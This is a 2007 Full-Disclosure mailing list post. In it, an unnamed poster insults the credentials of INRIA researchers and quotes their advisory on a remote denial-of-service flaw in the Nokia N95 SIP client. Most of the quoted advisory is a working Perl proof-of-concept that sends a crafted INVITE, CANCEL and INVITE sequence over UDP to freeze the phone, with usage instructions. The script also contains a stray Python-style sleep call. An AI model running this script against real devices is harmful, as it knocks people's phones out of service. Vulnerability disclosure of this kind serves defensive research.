So almighty Phd what is your thesis exactly? To me it seems to be 'how to run a fuzzer then write crappy perl scripts to exploit DoS conditions'
does this properly summarize your phd credentials? I guess you could tack on 'after writing the crappy scripts, flood mailing lists with our crap, and get made fun of' I am sure you will serve the academic community great one day when teach "hacking" classes revolving around the latest editions of hacking exposed On Dec 5, 2007 11:05 AM, Radu State <[EMAIL PROTECTED]> wrote: > Nokia N95 cellphone remote DoS using the SIP Stack > > > > Severity: > > High – Denial of Service > > > > Hardware: > > Nokia N95 > > > > Firmware: > > Tested version: Nokia RM-159 V 12.0.013 > > > > Notification: > > Vulnerability found: 11 September 2007 > > Contact Nokia Support: 12 September 2007 / None reply Contact Nokia > Security Support: 19 September 2007 / None reply > > > > Vulnerability Synopsis: > > If the device has the SIP Phone client activated, a sequence of SIP > messages turn the device in an inconsistent state where the user is not able > to operate it anymore until it reboots. > > > > The sequence of messages consists in 2 different SIP Dialogs where the > first initiates an INVITE transaction but immediately closes it (in an > anticipated manner). While, the second transaction initiates a normal INVITE > transaction that trigger the vulnerability of the target. > > > > The sequence of messages is illustrated below. > > > > X ------------------------- INVITE -----------------------> Nokiav12 > > X <---------------------- 100 Trying ---------------------- Nokiav12 > > X ------------------------- CANCEL -----------------------> Nokiav12 > > X <----------------- OK (to the Cancel) ------------------- Nokiav12 > > X <---------------- 487 Request Terminated ---------------- Nokiav12 > > > > --------New Dialog-------- > > > > X ------------------------- INVITE -----------------------> Nokiav12 > > X <---------------------- 100 Trying ---------------------- Nokiav12 > > X <---------------------- 180 Trying ---------------------- Nokiav12 > > > > ---- The device does not work properly anymore ---- > > > > Impact: > > A remote entity can take down all the services of the cell phone > > > > Resolution: > > As we did not get any proper reply from Nokia about the subject, the best > way will be to disable the SIP Client > > > > Credits: > > Humberto J. Abdelnur (Ph.D Student) > > Radu State (Ph.D) > > Olivier Festor (Ph.D) > > > > This vulnerability was identified by the Madynes research team at INRIA > Lorraine, using KiF the Madynes VoIP fuzzer. > > http://madynes.loria.fr/ > > > > > > Proof of Concept: > > > > A perl script (nokiav12.pl) is attached to this mail. Before launching > > it, the SIP phone has to be initialed in the target device > > > > Command: > > perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername> > > > > Eg. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu > > > > > > #!/usr/bin/perl > > > > ################################################## > > # Vulnerabily discovered using KiF ~ Kiph # > > # # > > # Authors: # > > # Humberto J. Abdelnur (Ph.D Student) # > > # Radu State (Ph.D) # > > # Olivier Festor (Ph.D) # > > # # > > # Madynes Team, LORIA - INRIA Lorraine # > > # http://madynes.loria.fr # > > ################################################## > > > > use IO::Socket::INET; > > use String::Random; > > > > die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>" > > unless ($ARGV[3]); > > > > $targetUser = $ARGV[1]; > > $targetIP = $ARGV[0]; > > > > $attackerUser = $ARGV[3]; > > $attackerIP= $ARGV[2]; > > > > $socket=new IO::Socket::INET->new( > > Proto=>'udp', > > PeerPort=>5060, > > PeerAddr=>$targetIP, > > LocalPort=>5060); > > > > $foo = new String::Random; > > $callid= $foo->randpattern("CCccnCn"); > > $cseq = $foo->randregex('\d\d\d\d'); > > > > $sdp = "v=0\r > > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r > > s=-\r > > c=IN IP4 $attackerIP\r > > t=0 0\r > > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r > > a=sendrecv\r > > a=ptime:20\r > > a=maxptime:200\r > > a=fmtp:96 mode-change-neighbor=1\r > > a=fmtp:18 annexb=no\r > > a=fmtp:98 0-15\r > > a=rtpmap:96 AMR/8000/1\r > > a=rtpmap:0 PCMU/8000/1\r > > a=rtpmap:8 PCMA/8000/1\r > > a=rtpmap:97 iLBC/8000/1\r > > a=rtpmap:18 G729/8000/1\r > > a=rtpmap:98 telephone-event/8000/1\r > > a=rtpmap:13 CN/8000/1\r > > "; > > > > $sdplen= length $sdp; > > > > $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r > > From: <sip:[EMAIL PROTECTED]>;tag=1\r > > To: <sip:[EMAIL PROTECTED]>\r > > Call-ID: [EMAIL PROTECTED] > > CSeq: $cseq INVITE\r > > Max-Forwards: 70\r > > Contact: <sip:[EMAIL PROTECTED]>\r > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, > > MESSAGE\r > > Content-Type: application/sdp\r > > Content-Length: $sdplen\r > > \r > > $sdp"; > > $socket->send($msg); > > $text = ''; > > while (not $text =~ /^SIP\/2.0 100(.\r\n)*/ ){ > > $socket->recv($text,1024,0); > > } > > > > $msg = "CANCEL sip:[EMAIL PROTECTED] SIP/2.0\r > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r > > From: <sip:[EMAIL PROTECTED]>;tag=1\r > > To: <sip:[EMAIL PROTECTED]>;tag=1\r > > Call-ID: [EMAIL PROTECTED] > > CSeq: $cseq CANCEL\r > > Max-Forwards: 70\r > > Content-Length: 0\r > > \r > > "; > > $socket->send($msg); > > time.sleep(1); > > $callid= $foo->randpattern("CCccnCn"); > > $cseq = $foo->randregex('\d\d\d\d'); > > $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r > > From: <sip:[EMAIL PROTECTED]>;tag=2\r > > To: <sip:[EMAIL PROTECTED]>\r > > Call-ID: [EMAIL PROTECTED] > > CSeq: $cseq INVITE\r > > Contact: <sip:[EMAIL PROTECTED]>\r > > Max-Forwards: 70\r > > Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, > > MESSAGE\r > > Content-Type: application/sdp\r > > Content-Length: $sdplen\r > > \r > > $sdp"; > > $socket->send($msg); > > > > > > > > No virus found in this outgoing message. > Checked by AVG Free Edition. > Version: 7.5.503 / Virus Database: 269.16.14/1171 - Release Date: > 04/12/2007 19:31 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/